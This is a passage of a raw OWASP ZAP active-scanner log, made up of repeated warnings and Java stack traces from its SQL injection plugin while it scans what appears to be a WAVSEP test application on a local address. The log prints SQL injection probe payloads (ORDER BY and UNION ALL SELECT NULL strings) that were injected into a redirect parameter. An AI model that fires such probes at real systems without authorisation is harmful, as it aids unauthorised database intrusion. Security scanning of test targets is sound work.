org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682368 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' ORDER BY 4802#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' ORDER BY 4802# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682369 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682369 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682370 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682370 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682371 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682372 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682372 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682373 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682374 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682374 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682375 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682375 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 3076#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 